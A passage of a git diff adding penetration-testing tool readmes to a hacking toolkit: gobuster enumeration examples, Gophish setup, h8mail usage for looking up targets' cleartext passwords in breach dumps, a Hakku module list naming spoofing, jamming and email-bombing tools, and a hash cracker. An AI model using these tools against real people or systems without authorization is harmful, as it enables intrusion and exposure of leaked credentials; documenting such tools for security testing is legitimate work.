[-] Unable to validate base domain: yp.to +Found: cr.yp.to [131.193.32.108, 131.193.32.109] +=============================================================== +2019/06/21 11:56:53 Finished +=============================================================== +``` + +Wildcard DNS is also detected properly: + +```text +gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dns +[+] Url/Domain : 0.0.1.xip.io +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/subdomains.txt +=============================================================== +2019/06/21 12:13:48 Starting gobuster +=============================================================== +2019/06/21 12:13:48 [-] Wildcard DNS found. IP address(es): 1.0.0.0 +2019/06/21 12:13:48 [!] To force processing of Wildcard DNS, specify the '--wildcard' switch. +=============================================================== +2019/06/21 12:13:48 Finished +=============================================================== +``` + +If the user wants to force processing of a domain that has wildcard entries, use `--wildcard`: + +```text +gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt --wildcard + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dns +[+] Url/Domain : 0.0.1.xip.io +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/subdomains.txt +=============================================================== +2019/06/21 12:13:51 Starting gobuster +=============================================================== +2019/06/21 12:13:51 [-] Wildcard DNS found. IP address(es): 1.0.0.0 +Found: 127.0.0.1.xip.io +Found: test.127.0.0.1.xip.io +=============================================================== +2019/06/21 12:13:53 Finished +=============================================================== +``` + +## `dir` Mode + +### Options + +```text +Uses directory/file enumeration mode + +Usage: + gobuster dir [flags] + +Flags: + -f, --add-slash Append / to each request + -c, --cookies string Cookies to use for the requests + -d, --discover-backup Also search for backup files by appending multiple backup extensions + --exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes. + -e, --expanded Expanded mode, print full URLs + -x, --extensions string File extension(s) to search for + -r, --follow-redirect Follow redirects + -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' + -h, --help help for dir + --hide-length Hide the length of the body in the output + -m, --method string Use the following HTTP method (default "GET") + -n, --no-status Don't print status codes + -k, --no-tls-validation Skip TLS certificate verification + -P, --password string Password for Basic Auth + --proxy string Proxy to use for requests [http(s)://host:port] + --random-agent Use a random User-Agent string + --retry Should retry on request timeout + --retry-attempts int Times to retry on request timeout (default 3) + -s, --status-codes string Positive status codes (will be overwritten with status-codes-blacklist if set) + -b, --status-codes-blacklist string Negative status codes (will override status-codes if set) (default "404") + --timeout duration HTTP Timeout (default 10s) + -u, --url string The target URL + -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") + -U, --username string Username for Basic Auth + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + +```text +gobuster dir -u https://mysite.com/path/to/folder -c 'session=123456' -t 50 -w common-files.txt -x .php,.html +``` + +Default options looks like this: + +```text +gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dir +[+] Url/Domain : https://buffered.io/ +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/shortlist.txt +[+] Status codes : 200,204,301,302,307,401,403 +[+] User Agent : gobuster/3.2.0 +[+] Timeout : 10s +=============================================================== +2019/06/21 11:49:43 Starting gobuster +=============================================================== +/categories (Status: 301) +/contact (Status: 301) +/posts (Status: 301) +/index (Status: 200) +=============================================================== +2019/06/21 11:49:44 Finished +=============================================================== +``` + +Default options with status codes disabled looks like this: + +```text +gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -n + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dir +[+] Url/Domain : https://buffered.io/ +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/shortlist.txt +[+] Status codes : 200,204,301,302,307,401,403 +[+] User Agent : gobuster/3.2.0 +[+] No status : true +[+] Timeout : 10s +=============================================================== +2019/06/21 11:50:18 Starting gobuster +=============================================================== +/categories +/contact +/index +/posts +=============================================================== +2019/06/21 11:50:18 Finished +=============================================================== +``` + +Verbose output looks like this: + +```text +gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -v + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dir +[+] Url/Domain : https://buffered.io/ +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/shortlist.txt +[+] Status codes : 200,204,301,302,307,401,403 +[+] User Agent : gobuster/3.2.0 +[+] Verbose : true +[+] Timeout : 10s +=============================================================== +2019/06/21 11:50:51 Starting gobuster +=============================================================== +Missed: /alsodoesnotexist (Status: 404) +Found: /index (Status: 200) +Missed: /doesnotexist (Status: 404) +Found: /categories (Status: 301) +Found: /posts (Status: 301) +Found: /contact (Status: 301) +=============================================================== +2019/06/21 11:50:51 Finished +=============================================================== +``` + +Example showing content length: + +```text +gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -l + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dir +[+] Url/Domain : https://buffered.io/ +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/shortlist.txt +[+] Status codes : 200,204,301,302,307,401,403 +[+] User Agent : gobuster/3.2.0 +[+] Show length : true +[+] Timeout : 10s +=============================================================== +2019/06/21 11:51:16 Starting gobuster +=============================================================== +/categories (Status: 301) [Size: 178] +/posts (Status: 301) [Size: 178] +/contact (Status: 301) [Size: 178] +/index (Status: 200) [Size: 51759] +=============================================================== +2019/06/21 11:51:17 Finished +=============================================================== +``` + +Quiet output, with status disabled and expanded mode looks like this ("grep mode"): + +```text +gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -q -n -e +https://buffered.io/index +https://buffered.io/contact +https://buffered.io/posts +https://buffered.io/categories +``` + +## `vhost` Mode + +### Options + +```text +Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter) + +Usage: + gobuster vhost [flags] + +Flags: + --append-domain Append main domain from URL to words from wordlist. Otherwise the fully qualified domains need to be specified in the wordlist. + -c, --cookies string Cookies to use for the requests + --domain string the domain to append when using an IP address as URL. If left empty and you specify a domain based URL the hostname from the URL is extracted + --exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes. + -r, --follow-redirect Follow redirects + -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' + -h, --help help for vhost + -m, --method string Use the following HTTP method (default "GET") + -k, --no-tls-validation Skip TLS certificate verification + -P, --password string Password for Basic Auth + --proxy string Proxy to use for requests [http(s)://host:port] + --random-agent Use a random User-Agent string + --retry Should retry on request timeout + --retry-attempts int Times to retry on request timeout (default 3) + --timeout duration HTTP Timeout (default 10s) + -u, --url string The target URL + -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") + -U, --username string Username for Basic Auth + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + + +```text +gobuster vhost -u https://mysite.com -w common-vhosts.txt +``` + +Normal sample run goes like this: + +```text +gobuster vhost -u https://mysite.com -w common-vhosts.txt + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Url: https://mysite.com +[+] Threads: 10 +[+] Wordlist: common-vhosts.txt +[+] User Agent: gobuster/3.2.0 +[+] Timeout: 10s +=============================================================== +2019/06/21 08:36:00 Starting gobuster +=============================================================== +Found: www.mysite.com +Found: piwik.mysite.com +Found: mail.mysite.com +=============================================================== +2019/06/21 08:36:05 Finished +=============================================================== +``` + +## `fuzz` Mode + +### Options + +```text +Uses fuzzing mode + +Usage: + gobuster fuzz [flags] + +Flags: + -c, --cookies string Cookies to use for the requests + --exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes. + -b, --excludestatuscodes string Negative status codes (will override statuscodes if set) + -r, --follow-redirect Follow redirects + -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' + -h, --help help for fuzz + -m, --method string Use the following HTTP method (default "GET") + -k, --no-tls-validation Skip TLS certificate verification + -P, --password string Password for Basic Auth + --proxy string Proxy to use for requests [http(s)://host:port] + --random-agent Use a random User-Agent string + --retry Should retry on request timeout + --retry-attempts int Times to retry on request timeout (default 3) + --timeout duration HTTP Timeout (default 10s) + -u, --url string The target URL + -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") + -U, --username string Username for Basic Auth + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + +```text +gobuster fuzz -u https://example.com?FUZZ=test -w parameter-names.txt +``` + +## `s3` Mode + +### Options + +```text +Uses aws bucket enumeration mode + +Usage: + gobuster s3 [flags] + +Flags: + -h, --help help for s3 + -m, --maxfiles int max files to list when listing buckets (only shown in verbose mode) (default 5) + -k, --no-tls-validation Skip TLS certificate verification + --proxy string Proxy to use for requests [http(s)://host:port] + --random-agent Use a random User-Agent string + --retry Should retry on request timeout + --retry-attempts int Times to retry on request timeout (default 3) + --timeout duration HTTP Timeout (default 10s) + -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + +```text +gobuster s3 -w bucket-names.txt +``` + +## `gcs` Mode + +### Options + +```text +Uses gcs bucket enumeration mode + +Usage: + gobuster gcs [flags] + +Flags: + -h, --help help for gcs + -m, --maxfiles int max files to list when listing buckets (only shown in verbose mode) (default 5) + -k, --no-tls-validation Skip TLS certificate verification + --proxy string Proxy to use for requests [http(s)://host:port] + --random-agent Use a random User-Agent string + --retry Should retry on request timeout + --retry-attempts int Times to retry on request timeout (default 3) + --timeout duration HTTP Timeout (default 10s) + -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + +```text +gobuster gcs -w bucket-names.txt +``` + +## Wordlists via STDIN + +Wordlists can be piped into `gobuster` via stdin by providing a `-` to the `-w` option: + +```bash +hashcat -a 3 --stdout ?l | gobuster dir -u https://mysite.com -w - +``` + +Note: If the `-w` option is specified at the same time as piping from STDIN, an error will be shown and the program will terminate. + +## Patterns + +You can supply pattern files that will be applied to every word from the wordlist. +Just place the string `{GOBUSTER}` in it and this will be replaced with the word. +This feature is also handy in s3 mode to pre- or postfix certain patterns. + +**Caution:** Using a big pattern file can cause a lot of request as every pattern is applied to every word in the wordlist. + +### Example file + +```text +{GOBUSTER}Partial +{GOBUSTER}Service +PRE{GOBUSTER}POST +{GOBUSTER}-prod +{GOBUSTER}-dev +``` + +#### Use case in combination with patterns + +- Create a custom wordlist for the target containing company names and so on +- Create a pattern file to use for common bucket names. + +```bash +curl -s --output - https://raw.githubusercontent.com/eth0izzle/bucket-stream/master/permutations/extended.txt | sed -s 's/%s/{GOBUSTER}/' > patterns.txt +``` + +- Run gobuster with the custom input. Be sure to turn verbose mode on to see the bucket details + +```text +gobuster s3 --wordlist my.custom.wordlist -p patterns.txt -v +``` + +Normal sample run goes like this: + +```text +PS C:\Users\firefart\Documents\code\gobuster> .\gobuster.exe s3 --wordlist .\wordlist.txt +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Threads: 10 +[+] Wordlist: .\wordlist.txt +[+] User Agent: gobuster/3.2.0 +[+] Timeout: 10s +[+] Maximum files to list: 5 +=============================================================== +2019/08/12 21:48:16 Starting gobuster in S3 bucket enumeration mode +=============================================================== +webmail +hacking +css +img +www +dav +web +localhost +=============================================================== +2019/08/12 21:48:17 Finished +=============================================================== +``` + +Verbose and sample run + +```text +PS C:\Users\firefart\Documents\code\gobuster> .\gobuster.exe s3 --wordlist .\wordlist.txt -v +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Threads: 10 +[+] Wordlist: .\wordlist.txt +[+] User Agent: gobuster/3.2.0 +[+] Verbose: true +[+] Timeout: 10s +[+] Maximum files to list: 5 +=============================================================== +2019/08/12 21:49:00 Starting gobuster in S3 bucket enumeration mode +=============================================================== +www [Error: All access to this object has been disabled (AllAccessDisabled)] +hacking [Error: Access Denied (AccessDenied)] +css [Error: All access to this object has been disabled (AllAccessDisabled)] +webmail [Error: All access to this object has been disabled (AllAccessDisabled)] +img [Bucket Listing enabled: GodBlessPotomac1.jpg (1236807b), HOMEWORKOUTAUDIO.zip (203908818b), ProductionInfo.xml (11946b), Start of Perpetual Motion Logo-1.mp3 (621821b), addressbook.gif (3115b)] +web [Error: Access Denied (AccessDenied)] +dav [Error: All access to this object has been disabled (AllAccessDisabled)] +localhost [Error: Access Denied (AccessDenied)] +=============================================================== +2019/08/12 21:49:01 Finished +=============================================================== +``` + +Extended sample run + +```text +PS C:\Users\firefart\Documents\code\gobuster> .\gobuster.exe s3 --wordlist .\wordlist.txt -e +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Threads: 10 +[+] Wordlist: .\wordlist.txt +[+] User Agent: gobuster/3.2.0 +[+] Timeout: 10s +[+] Expanded: true +[+] Maximum files to list: 5 +=============================================================== +2019/08/12 21:48:38 Starting gobuster in S3 bucket enumeration mode +=============================================================== +http://css.s3.amazonaws.com/ +http://www.s3.amazonaws.com/ +http://webmail.s3.amazonaws.com/ +http://hacking.s3.amazonaws.com/ +http://img.s3.amazonaws.com/ +http://web.s3.amazonaws.com/ +http://dav.s3.amazonaws.com/ +http://localhost.s3.amazonaws.com/ +=============================================================== +2019/08/12 21:48:38 Finished +=============================================================== +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gophish.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gophish.md new file mode 100755 index 00000000..9cb37563 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gophish.md @@ -0,0 +1,60 @@ +![gophish logo](https://raw.github.com/gophish/gophish/master/static/images/gophish_purple.png) + +Gophish +======= + +![Build Status](https://github.com/gophish/gophish/workflows/CI/badge.svg) [![GoDoc](https://godoc.org/github.com/gophish/gophish?status.svg)](https://godoc.org/github.com/gophish/gophish) + +Gophish: Open-Source Phishing Toolkit + +[Gophish](https://getgophish.com) is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training. + +### Install + +Installation of Gophish is dead-simple - just download and extract the zip containing the [release for your system](https://github.com/gophish/gophish/releases/), and run the binary. Gophish has binary releases for Windows, Mac, and Linux platforms. + +### Building From Source +**If you are building from source, please note that Gophish requires Go v1.10 or above!** + +To build Gophish from source, simply run ```go get github.com/gophish/gophish``` and ```cd``` into the project source directory. Then, run ```go build```. After this, you should have a binary called ```gophish``` in the current directory. + +### Docker +You can also use Gophish via the official Docker container [here](https://hub.docker.com/r/gophish/gophish/). + +### Setup +After running the Gophish binary, open an Internet browser to https://localhost:3333 and login with the default username (admin) and password (gophish). + +### Documentation + +Documentation can be found on our [site](http://getgophish.com/documentation). Find something missing? Let us know by filing an issue! + +### Issues + +Find a bug? Want more features? Find something missing in the documentation? Let us know! Please don't hesitate to [file an issue](https://github.com/gophish/gophish/issues/new) and we'll get right on it. + +### License +``` +Gophish - Open-Source Phishing Framework + +The MIT License (MIT) + +Copyright (c) 2013 - 2020 Jordan Wright + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software ("Gophish Community Edition") and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/h8mail.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/h8mail.md new file mode 100755 index 00000000..91a19cce --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/h8mail.md @@ -0,0 +1,193 @@ +H8Mail: OSINT para Encontrar Direcciones Email Hackeadas + +H8Mail es una herramienta de OSINT y buscador de contraseñas potente y fácil de usar. Puedes usarlo para encontrar contraseñas a través de diferentes servicios de violación y reconocimiento. + +#Características de H8Mail + +Coincidencia de patrones de correo electrónico (reg exp), útil para la lectura de las salidas de otras herramientas +Pasar URLs para encontrar y apuntar directamente a los correos electrónicos en las páginas +Patrones sueltos para búsquedas locales (“john.smith”, “evilcorp”) +Instalación sin complicaciones. Disponible a través de pip, sólo requiere solicitudes +Lectura masiva de archivos para la fijación de objetivos +Salida a archivo CSV o JSON +Compatible con los scripts torrent de “Breach Compilation”. +Búsqueda de archivos de texto claro y comprimidos .gz localmente usando multiprocesamiento +Obtener correos electrónicos relacionados +Persigue correos electrónicos relacionados añadiéndolos a la búsqueda en curso +Admite servicios de búsqueda premium para usuarios avanzados +Consulta personalizada de las APIs premium. Soporta nombre de usuario, hash, ip, dominio y contraseña y más +Reagrupa los resultados de las infracciones para todos los objetivos y métodos +Incluye la opción de ocultar las contraseñas para las demostraciones + +#APIs + +Servicio Funciones Estado +HaveIBeenPwned(v3) - Número de filtraciones de correo electrónico +HaveIBeenPwned Pastes(v3) - URL de los archivos de texto que mencionan los objetivos +Hunter.io – Público Número de correos electrónicos relacionados +Hunter.io – Servicio(nivel gratuito) Correos electrónicos relacionados con texto claro +Snusbase – Servicio Contraseñas en texto claro, hashs y sales, nombres de usuario, IPs – Rápido +Leak-Lookup – Público Número de resultados de filtraciones que se pueden buscar +Leak-Lookup – Servicio Contraseñas en texto claro, hashs y sales, nombres de usuario, IPs, dominio +Emailrep.io – Servicio(gratis) Lo último que se ha visto en las filtraciones, los perfiles de las redes sociales +scylla.so – Servicio (gratis) Contraseñas en texto claro, hashs y sales, nombres de usuario, IPs, dominios +Dehashed.com – Servicio Contraseñas en texto claro, hashs y sales, nombres de usuario, IPs, dominios +IntelX.io – Servicio (prueba gratuita) Contraseñas en texto claro, hashs y sales, nombres de usuario, IPs, dominio, billeteras Bitcoin, IBAN +Breachdirectory.tk – Servicio (gratis) Contraseñas en texto claro, hashs y sales, nombres de usuario, dominio + +Consulta para un único objetivo +h8mail -t objetivo@dominio.com + + +Buscar email hackeado +Ver cuentas y contraseñas hackeadas con H8Mail + +Consulta de la lista de objetivos, indicando el archivo de configuración para las claves de la API, salida a pwned_targets.csv +h8mail -t targets.txt -c config.ini -o pwned_targets.csv + +Consulta sin realizar llamadas a la API mediante una copia local de Breach Compilation +h8mail -t targets.txt -bc ../Downloads/BreachCompilation/ -sk + +Buscar en todos los archivos .gz los objetivos encontrados en targets.txt localmente +h8mail -t targets.txt -gz /tmp/Collection1/ -sk + +Comprobar un volcado de texto claro para el objetivo. Agregar los siguientes 10 correos electrónicos relacionados a los objetivos que deseas comprobar. Lectura de claves desde la CLI. +h8mail -t admin@evilcorp.com -lb /tmp/4k_Combo.txt -ch 10 -k "hunterio=ABCDE123" + +Para más detalles de su uso, puedes visitar el repositorio en GitHub o escribir el siguiente comando: +h8mail -h + + + +----- + +## :tangerine: Usage + +```bash +usage: h8mail [-h] [-t USER_TARGETS [USER_TARGETS ...]] + [-u USER_URLS [USER_URLS ...]] [-q USER_QUERY] [--loose] + [-c CONFIG_FILE [CONFIG_FILE ...]] [-o OUTPUT_FILE] + [-bc BC_PATH] [-sk] [-k CLI_APIKEYS [CLI_APIKEYS ...]] + [-lb LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...]] + [-gz LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...]] [-sf] + [-ch [CHASE_LIMIT]] [--power-chase] [--hide] [--debug] + [--gen-config] + +Email information and password lookup tool + +optional arguments: + -h, --help show this help message and exit + -t USER_TARGETS [USER_TARGETS ...], --targets USER_TARGETS [USER_TARGETS ...] + Either string inputs or files. Supports email pattern + matching from input or file, filepath globing and + multiple arguments + -u USER_URLS [USER_URLS ...], --url USER_URLS [USER_URLS ...] + Either string inputs or files. Supports URL pattern + matching from input or file, filepath globing and + multiple arguments. Parse URLs page for emails. + Requires http:// or https:// in URL. + -q USER_QUERY, --custom-query USER_QUERY + Perform a custom query. Supports username, password, + ip, hash, domain. Performs an implicit "loose" search + when searching locally + --loose Allow loose search by disabling email pattern + recognition. Use spaces as pattern seperators + -c CONFIG_FILE [CONFIG_FILE ...], --config CONFIG_FILE [CONFIG_FILE ...] + Configuration file for API keys. Accepts keys from + Snusbase, WeLeakInfo, Leak-Lookup, HaveIBeenPwned, + Emailrep, Dehashed and hunterio + -o OUTPUT_FILE, --output OUTPUT_FILE + File to write CSV output + -bc BC_PATH, --breachcomp BC_PATH + Path to the breachcompilation torrent folder. Uses the + query.sh script included in the torrent + -sk, --skip-defaults Skips HaveIBeenPwned and HunterIO check. Ideal for + local scans + -k CLI_APIKEYS [CLI_APIKEYS ...], --apikey CLI_APIKEYS [CLI_APIKEYS ...] + Pass config options. Supported format: "K=V,K=V" + -lb LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...], --local-breach LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...] + Local cleartext breaches to scan for targets. Uses + multiprocesses, one separate process per file, on + separate worker pool by arguments. Supports file or + folder as input, and filepath globing + -gz LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...], --gzip LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...] + Local tar.gz (gzip) compressed breaches to scans for + targets. Uses multiprocesses, one separate process per + file. Supports file or folder as input, and filepath + globing. Looks for 'gz' in filename + -sf, --single-file If breach contains big cleartext or tar.gz files, set + this flag to view the progress bar. Disables + concurrent file searching for stability + -ch [CHASE_LIMIT], --chase [CHASE_LIMIT] + Add related emails from hunter.io to ongoing target + list. Define number of emails per target to chase. + Requires hunter.io private API key if used without + power-chase + --power-chase Add related emails from ALL API services to ongoing + target list. Use with --chase + --hide Only shows the first 4 characters of found passwords + to output. Ideal for demonstrations + --debug Print request debug information + --gen-config, -g Generates a configuration file template in the current + working directory & exits. Will overwrite existing + h8mail_config.ini file +``` + +----- + +## :tangerine: Usage examples + +###### Query for a single target + +```bash +$ h8mail -t target@example.com +``` + +###### Query for list of targets, indicate config file for API keys, output to `pwned_targets.csv` +```bash +$ h8mail -t targets.txt -c config.ini -o pwned_targets.csv +``` + +###### Query a list of targets against local copy of the Breach Compilation, pass API key for [Snusbase](https://snusbase.com/) from the command line +```bash +$ h8mail -t targets.txt -bc ../Downloads/BreachCompilation/ -k "snusbase_token=$snusbase_token" +``` + +###### Query without making API calls against local copy of the Breach Compilation +```bash +$ h8mail -t targets.txt -bc ../Downloads/BreachCompilation/ -sk +``` + +###### Search every .gz file for targets found in targets.txt locally, skip default checks + +```bash +$ h8mail -t targets.txt -gz /tmp/Collection1/ -sk +``` + +###### Check a cleartext dump for target. Add the next 10 related emails to targets to check. Read keys from CLI + +```bash +$ h8mail -t admin@evilcorp.com -lb /tmp/4k_Combo.txt -ch 10 -k "hunterio=ABCDE123" +``` +###### Query username. Read keys from CLI + +```bash +$ h8mail -t JSmith89 -q username -k "dehashed_email=user@email.com" "dehashed_key=ABCDE123" +``` + +###### Query IP. Chase all related targets. Read keys from CLI + + +```bash +$ h8mail -t 42.202.0.42 -q ip -c h8mail_config_priv.ini -ch 2 --power-chase +``` + +###### Fetch URL content (CLI + file). Target all found emails + + +```bash +$ h8mail -u "https://pastebin.com/raw/kQ6WNKqY" "list_of_urls.txt" +``` + + +----- diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hakku.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hakku.md new file mode 100755 index 00000000..45ba3dd8 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hakku.md @@ -0,0 +1,83 @@ +# Hakku Framework [![Build Status][build]][build link] ![License][license] ![Python][python] + + +#### What is Hakku Framework? + +Hakku is simple framework that has been made for penetration testing tools. +Hakku framework offers simple structure, basic CLI, and useful features for penetration testing tools developing. +Hakku is on early stages and may be unstable, so please download the released versions from github or sourceforge, +don't just clone github repository except you don't want stability, you want to try out latest features, or you just want to develop Hakku. +Hakku is under MIT license, in other words you can do what you ever want with the source code. + +#### What will i need to run Hakku framework? + +Hakku framework is written in python 3, and developed mainly on Arch Linux. +So you should get Hakku framework running with Linux based operating system, python 3.5, and the dependencies. + +#### How i can get started? + +If you are new to Hakku framework you should look at the official wiki. + +#### OS support + +* Linux supported, and developed on/for linux +* OS X support not planned +* Windows support not planned + +#### Basic features + +Hakku framework features basic CLI to load up and run penetration testing tools, simple scripting interface, and python api. + +#### Modules +total count of modules: 24 + +* apache_users +* arp_dos +* arp_monitor +* arp_spoof +* bluetooth_pod +* cloudflare_resolver +* dhcp_dos +* dir_scanner +* dns_spoof +* email_bomber +* hostname_resolver +* mac_spoof +* mitm +* network_kill +* pma_scanner +* port_scanner +* proxy_scout +* whois +* web_killer +* web_scout +* wifi_jammer +* zip_cracker +* rar_cracker +* wordlist_gen + +#### Dependencies +Hakku framework itself doesn't need nothing more than python 3.5, but it's network scanner requires tcpdump. +Hakku includes all python dependencies so you don't have to install them. +All module dependencies are listed below. +ethtool, aircrack-ng, ettercap-text-only, dsniff, xterm, driftnet, tcpdump, libnetfilter-queue-dev, python3.5-dev, hcitool, sslstrip, l2ping + +#### Web pages + +* Official website: http://hakkuproject.org +* Official wiki: https://github.com/4shadoww/hakkuframework/wiki/ +* Github: https://github.com/4shadoww/hakkuframework/ +* SourceForge: https://sourceforge.net/projects/hakkuframework/ + +#### Contact +If you do have any questions etc. about Hakku Framework, then i don't mind if you send me email. + +* email: 4shadoww0@gmail.com +* bug reports to github or here: 4shadoww0@gmail.com + +Hakku Framework is under MIT license + +[build]: https://img.shields.io/travis/4shadoww/hakkuframework.svg?style=flat-square +[build link]: https://travis-ci.org/4shadoww/hakkuframework +[license]: https://img.shields.io/badge/license-MIT-blue.svg?style=flat-square +[python]: https://img.shields.io/badge/python-3.5-brightgreen.svg?style=flat-square \ No newline at end of file diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hasher.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hasher.md new file mode 100755 index 00000000..9b3dd816 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hasher.md @@ -0,0 +1,37 @@ +# hasher 3.0.1(alpha) + +Hasher is a Hash Cracker that has supported more than 7 types of hashes + +# hasher feature +- [x] auto detect hash +- [x] supports windows and linux platforms +- [x] fast decrypt +- [x] list of supported hashes: +``` +- md4 +- md5 +- sha1 +- sha224 +- sha256 +- sha384 +- sha512 +- ripemd160 +- whirlpool +- mysql 3.2.3 +- mysql 4.1 +- mssql2000 +- mssql2005 +- nthash +- lmhash +- ntlm hash +``` +# [ Installation ] +``` +$ apt update upgrade +$ apt install python2 git +$ git clone https://github.com/ciku370/hasher +$ cd hasher +$ python2 hash.py +``` +# Screenshot + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hashid.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hashid.md new file mode 100755 index 00000000..5260126d --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hashid.md @@ -0,0 